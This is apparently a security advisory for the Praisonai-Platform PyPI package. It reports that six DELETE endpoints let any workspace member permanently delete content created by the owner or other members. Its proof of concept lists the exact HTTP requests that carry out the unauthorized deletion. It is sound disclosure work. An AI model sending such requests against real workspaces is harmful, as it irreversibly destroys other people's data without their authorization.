PT-2026-53147 · Pypi · Praisonai-Platform
Published
2026-06-18
·
Updated
2026-06-18
CVSS v3.1
8.1
High
| Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H |
Summary
A workspace member can permanently delete any resource — projects, agents, issues, labels, issue dependencies, and issue-label attachments — created by the workspace owner or other members. All six content DELETE endpoints enforce workspace membership but perform no ownership or role check. A single malicious or compromised member account can wipe an entire workspace's content irreversibly.
Details
The published role capability matrix explicitly restricts members from modifying others' content:
| Capability | Owner | Admin | Member |
|---|---|---|---|
| Create issues/tasks | ✅ | ✅ | ✅ |
| Edit own content | ✅ | ✅ | ✅ |
| Edit others' content | ✅ | ✅ | ❌ |
The DELETE handlers for all content resources check that the requesting user is a workspace member, but do not verify that the user either created the resource or holds an
owner/admin role. The result is that the member role has unrestricted DELETE access over all workspace content regardless of who created it.Confirmed vulnerable endpoints:
| Endpoint | Expected | Actual |
|---|---|---|
DELETE /api/v1/workspaces/{workspace id}/projects/{project id} | 403 | 204 |
DELETE /api/v1/workspaces/{workspace id}/agents/{agent id} | 403 | 204 |
DELETE /api/v1/workspaces/{workspace id}/issues/{issue id} | 403 | 204 |
DELETE /api/v1/workspaces/{workspace id}/labels/{label id} | 403 | 204 |
DELETE /api/v1/workspaces/{workspace id}/issues/{issue id}/dependencies/{dep id} | 403 | 204 |
DELETE /api/v1/workspaces/{workspace id}/issues/{issue id}/labels/{label id} | 403 | 204 |
The missing check is isolated to content resource DELETEs.
PoC
Requirements: Two accounts — owner (resource creator) and member (attacker).
1. Register both accounts
http
POST /api/v1/auth/register
Content-Type: application/json
{"email": "owner@example.com", "password": "Password1!", "name": "owner"}http
POST /api/v1/auth/register
Content-Type: application/json
{"email": "member@example.com", "password": "Password1!", "name": "member"}2. Owner creates workspace, adds member with
member rolehttp
POST /api/v1/workspaces/
Authorization: Bearer <owner token>
Content-Type: application/json
{"name": "Test Workspace"}http
POST /api/v1/workspaces/{workspace id}/members
Authorization: Bearer <owner token>
Content-Type: application/json
{"user id": "<member user id>", "role": "member"}3. Owner creates a project
http
POST /api/v1/workspaces/{workspace id}/projects/
Authorization: Bearer <owner token>
Content-Type: application/json
{"title": "Owner's Project"}Response
201 Created:json
{"id": "29ce3e29-a6f0-4063-b0a2-d565b4f1c1a6", "title": "Owner's Project", ...}4. Member deletes the owner's project
http
DELETE /api/v1/workspaces/{workspace id}/projects/29ce3e29-a6f0-4063-b0a2-d565b4f1c1a6
Authorization: Bearer <member token>Response:
204 No Content5. Owner confirms the project is permanently gone
http
GET /api/v1/workspaces/{workspace id}/projects/29ce3e29-a6f0-4063-b0a2-d565b4f1c1a6
Authorization: Bearer <owner token>Response:
404 Not Foundjson
{"detail": "Project not found"}The same steps reproduce on all six affected resource types (agents, issues, labels, issue dependencies, issue-label attachments).
Impact
This is an improper authorization vulnerability. A workspace member can delete resources (projects, agents, issues, labels) created by other workspace members or the owner. The documented permission model restricts members to managing only their own content — the DELETE endpoints do not enforce this.
Who is impacted: Workspace owners and members who share a workspace with untrusted or compromised member accounts.
Fix
Improper Authorization
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Praisonai-Platform